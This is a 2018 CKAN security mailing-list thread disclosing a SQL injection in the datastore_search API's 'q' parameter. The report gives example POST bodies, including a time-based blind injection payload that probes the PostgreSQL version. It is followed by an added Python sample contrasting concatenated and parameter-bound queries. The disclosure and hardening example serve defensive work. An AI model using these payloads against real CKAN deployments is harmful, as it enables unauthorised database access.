[CKAN-Security] SQL Injection Vulnerability

Adrià Mercader adria.mercader at okfn.org
Fri Jun 8 20:31:31 UTC 2018


Hi Gonzalo,

Thanks for your report. We will assess it as soon as possible and get
back to you.

Best,

Adrià

On 8 June 2018 at 12:37, Gonzalo Garcia | ODS Red Team
<gonzalo.g at opendatasecurity.io> wrote:
> Hi, I've found a SQL Injection vulnerability on
> /api/3/action/datastore_search. I've exploited it on "q" parameter, but
> maybe other parameters are affected too.
>
> Example POST data:
> Query fails
> {"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":" ' "
> ,"filters":{},"limit":100,"offset":0}
>
> Query doesn't fail because PostgreSQL version string is "PostgreSQL..." and
> "o" is the second char of the string.
> {"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":"'|| (SELECT CASE
> substr(version(),2,1) WHEN 'o' THEN 'A' ELSE sleep(5) END) ||'"
> ,"filters":{},"limit":100,"offset":0}
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>
> Repo: https://github.com/ckan/ckan-security
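
The "Query fails" case in the report above, shown as an added example that is not part of the original thread and is not CKAN's code: a search that pastes q into the SQL text next to one that binds it as a parameter. Assumptions: sqlite3 stands in for the PostgreSQL datastore so the block runs offline, and the table, rows and function names are hypothetical.

```python
import sqlite3

# Constructed sample rows; sqlite3 is a stand-in for the real datastore.
ROWS = [(1, "air quality 2017"), (2, "bus routes"), (3, "o'hare flights")]

# The q value from the report's first example POST body.
PAGE_Q = " ' "


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE records (id INTEGER PRIMARY KEY, body TEXT)")
    db.executemany("INSERT INTO records VALUES (?, ?)", ROWS)
    return db


def search_concat(db, q):
    """Hypothetical vulnerable pattern: q becomes part of the SQL text."""
    sql = "SELECT id FROM records WHERE body LIKE '%" + q + "%' ORDER BY id"
    return [row[0] for row in db.execute(sql)]


def search_bound(db, q):
    """Hardened form: q is sent as a bound parameter, never as SQL text."""
    # Escape LIKE wildcards so q is matched literally, not as a pattern.
    literal = q.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT id FROM records WHERE body LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in db.execute(sql, ("%" + literal + "%",))]


def classify(db, search, q):
    """Return ('ok', ids) or ('sql_error', message) for one q value."""
    try:
        return ("ok", search(db, q))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concat", search_concat), ("bound", search_bound)):
        for q in (PAGE_Q, "'", "bus", "%"):
            print(name, repr(q), classify(db, fn, q))
```

A database error triggered by a lone quote in q is the signal the report describes; with binding the same value is an ordinary search term that matches nothing.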


